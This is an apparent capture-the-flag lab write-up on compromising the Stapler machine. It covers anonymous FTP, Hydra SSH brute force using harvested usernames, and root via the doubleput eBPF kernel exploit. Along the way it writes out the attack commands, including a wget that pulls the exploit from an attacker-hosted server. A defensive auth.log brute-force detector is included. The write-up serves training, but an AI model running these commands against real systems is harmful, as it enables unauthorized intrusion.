Stapler Machine — FTP Misconfiguration to Kernel Root

Today's lab demonstrated how weak service configuration + credential brute-force + kernel vulnerability can lead to full system compromise.

🔎 Step 1: Initial Enumeration

Started with full service scan:

nmap -sCV -A --min-rate 1000 192.168.xx.xx

Explanation:

  • -sC → Default scripts
  • -sV → Version detection
  • -A → OS detection + aggressive scan
  • --min-rate 1000 → Faster scanning

Findings:

✔ FTP service running
✔ SSH service running
✔ Target OS: Ubuntu 16.x

📂 Step 2: FTP Enumeration

Checked anonymous access:

ftp 192.168.xx.xx

Login as:

Username: anonymous
Password: anonymous

✔ Anonymous login allowed


Downloaded the note files available on the FTP server.

The notes referenced a user named elly.

๐Ÿ” Step 3: Brute Forcing FTP User

Attempted brute-force against FTP user elly.

After successful login:

ftp 192.168.xx.xx

Logged in as:

Username: elly
Password: <discovered_password>


๐Ÿ“ Step 4: Extracting Usernames from passwd File

Inside FTP share, found passwd file.

Downloaded it:

mget passwd


The passwd file contained a large number of user accounts.


Extracted the usernames (the first colon-separated field of each line):

awk -F: '{print $1}' passwd > username.txt

This created a clean list of users for brute force.


💣 Step 5: SSH Brute Force

Used Hydra to brute force SSH:

hydra -L username.txt -P username.txt ssh://192.168.xx.xx

Explanation:

  • -L → Username list
  • -P → Password list (the same username list is reused here, so every candidate password is also one of the extracted usernames)
  • Target: SSH service

Successfully obtained valid SSH credentials.
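From the defender's side, the brute force in Step 5 leaves a distinctive trace in sshd's auth.log: many failed password attempts from one source spread across many different usernames, sometimes followed by an accepted login. The detector below is an added example, not part of the original writeup; the log lines, host name, user names and addresses in it are constructed for the demo.

```python
import re
from collections import defaultdict

# Constructed sample auth.log lines (not captured from the lab); the format is
# OpenSSH sshd's standard password-auth logging. Hosts and users are made up.
SAMPLE_AUTH_LOG = """\
Jun  3 10:01:02 stapler sshd[2201]: Failed password for invalid user daemon from 192.168.56.10 port 40110 ssh2
Jun  3 10:01:02 stapler sshd[2203]: Failed password for invalid user bin from 192.168.56.10 port 40112 ssh2
Jun  3 10:01:03 stapler sshd[2205]: Failed password for root from 192.168.56.10 port 40114 ssh2
Jun  3 10:01:03 stapler sshd[2207]: Failed password for elly from 192.168.56.10 port 40116 ssh2
Jun  3 10:01:04 stapler sshd[2209]: Failed password for invalid user zoe from 192.168.56.10 port 40118 ssh2
Jun  3 10:01:04 stapler sshd[2211]: Accepted password for alice from 192.168.56.10 port 40120 ssh2
Jun  3 10:05:40 stapler sshd[2300]: Failed password for elly from 192.168.56.20 port 50000 ssh2
Jun  3 10:06:10 stapler sshd[2302]: Accepted password for elly from 192.168.56.20 port 50002 ssh2
"""

LOG_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_auth_log(text):
    """Yield (result, user, source_ip) for every sshd password-auth line."""
    for line in text.splitlines():
        m = LOG_RE.search(line)
        if m:
            yield m.group("result"), m.group("user"), m.group("ip")


def detect_ssh_bruteforce(text, min_failures=5, min_users=3):
    """Flag sources whose failures are spread over many distinct usernames
    (the signature of a list-driven attack such as hydra -L/-P). A success
    from the same source after its failures is a likely compromised account."""
    failures, users, accepted_after = defaultdict(int), defaultdict(set), defaultdict(set)
    for result, user, ip in parse_auth_log(text):
        if result == "Failed":
            failures[ip] += 1
            users[ip].add(user)
        elif failures[ip]:  # Accepted, and this source had already failed before
            accepted_after[ip].add(user)
    return {
        ip: {"failures": n, "distinct_users": len(users[ip]),
             "compromised_accounts": sorted(accepted_after[ip])}
        for ip, n in failures.items()
        if n >= min_failures and len(users[ip]) >= min_users
    }


if __name__ == "__main__":
    for ip, info in detect_ssh_bruteforce(SAMPLE_AUTH_LOG).items():
        print(ip, info)
```

A single user mistyping a password (the second source in the sample) is not flagged, because the failures neither reach the count threshold nor span several usernames.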


🖥 Step 6: SSH Access

Logged in via SSH:

ssh user@192.168.xx.xx

User access gained.


⚡ Step 7: Privilege Escalation — Kernel Exploit

Checked kernel version:

uname -a

The target was running Ubuntu 16.x, a vulnerable kernel version.


Searched for a matching exploit:

searchsploit ubuntu 16.04


Copied the exploit to Kali:

searchsploit -m <exploit_id>

Transferred it to the target machine.

On Kali:

python3 -m http.server 8000


On target:

wget http://<attacker_ip>:8000/39772.zip

Unzipped the file on the target machine.

🛠 Exploit Execution Steps

1️⃣ Extract archive:

tar -xvf exploit.tar

2๏ธโƒฃ Navigate to directory:

cd ebpf

3️⃣ Compile exploit:

chmod +x compile.sh
./compile.sh

4️⃣ Execute exploit:

./doubleput

🔥 Result

✔ User shell
✔ Kernel exploit executed
✔ Root shell obtained successfully

🎥 Full Practical Demonstration

For a complete step-by-step video walkthrough, watch here: